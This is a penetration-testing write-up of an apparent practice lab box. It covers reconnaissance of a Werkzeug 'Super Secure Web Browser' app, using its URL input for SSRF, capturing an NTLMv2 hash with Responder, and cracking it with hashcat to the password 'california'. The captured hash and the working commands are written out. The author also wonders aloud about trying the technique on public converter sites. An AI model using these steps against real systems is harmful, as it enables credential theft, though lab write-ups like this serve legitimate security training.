Web Services

5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http          syn-ack ttl 127 Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| http-methods: 
WhatWeb report for http://192.168.105.165:8080
Status    : 200 OK
Title     : Super Secure Web Browser
IP        : 192.168.105.165
Country   : RESERVED, ZZ

Summary   : Bootstrap[3.3.6], HTML5, HTTPServer[Werkzeug/2.0.1 Python/3.9.0], JQuery[2.2.2], Python[3.9.0], Script, Werkzeug[2.0.1]

Detected Plugins:
[ Bootstrap ]
	Bootstrap is an open source toolkit for developing with
	HTML, CSS, and JS.

	Version      : 3.3.6
	Website     : https://getbootstrap.com/

[ HTML5 ]
	HTML version 5, detected by the doctype declaration


[ HTTPServer ]
	HTTP server header string. This plugin also attempts to
	identify the operating system from the server header.

	String       : Werkzeug/2.0.1 Python/3.9.0 (from server string)

[ JQuery ]
	A fast, concise, JavaScript that simplifies how to traverse
	HTML documents, handle events, perform animations, and add
	AJAX.

	Version      : 2.2.2
	Website     : http://jquery.com/

[ Python ]
	Python is a programming language that lets you work more
	quickly and integrate your systems more effectively. You
	can learn to use Python and see almost immediate gains in
	productivity and lower maintenance costs.

	Version      : 3.9.0
	Website     : http://www.python.org/

[ Script ]
	This plugin detects instances of script HTML elements and
	returns the script language/type.


[ Werkzeug ]
	Werkzeug is a WSGI utility library for Python.

	Version      : 2.0.1
	Website     : http://werkzeug.pocoo.org/

HTTP Headers:
	HTTP/1.0 200 OK
	Content-Type: text/html; charset=utf-8
	Content-Length: 3608
	Server: Werkzeug/2.0.1 Python/3.9.0
	Date: Thu, 14 Jul 2022 20:10:20 GMT

Its a web browser, which i could refer back and it would visit my links.

I tried different approaches such as uploading php files, asp, aspx, but with no avail. However, theres some cool shit i heard long time ago from a post I saw on LinkedIN. "If there is a url input, there is SSRF".

"A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution."

Apparently if you listen with responder you are able to capture an NTLMv2 hash.

responder -I tun0 -wv

Notice how the website is some sort of brower. I wonder what sort of stuff one can do with SSRF, I know so many websites that are like this. I used to use obviously legal youtube video converters and they required you to input a link, which I'm guessing if I fired up my own webserver I would be able to capture hashes with Responder and do some other crazy stuff. I will definitely go through the SSRF section on PortSwiggerAcademy.

Enough talk, lets get to breaking this hash.

hashcat -m 5600 enox /usr/share/wordlists/rockyou.txt -r /home/kali/hashcatrules --debug-mode=1 --debug-file=matched.rule
ENOX::HEIST:ab8d09243f9210b2:00915cc0e81fe5868657b0d8c18d07b6:01010000000000007c064802cd97d801089b45b936583ff3000000000200080042004a004100320001001e00570049004e002d004c004d0030003400480037004c00550031004d004c000400140042004a00410032002e004c004f00430041004c0003003400570049004e002d004c004d0030003400480037004c00550031004d004c002e0042004a00410032002e004c004f00430041004c000500140042004a00410032002e004c004f00430041004c0008003000300000000000000000000000003000007a29a27863f5d1ad6883fe224b91c4f66e576fa3fc0afa4d9593d7e005faf3db0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340039002e003100300035000000000000000000:california
california

Last updated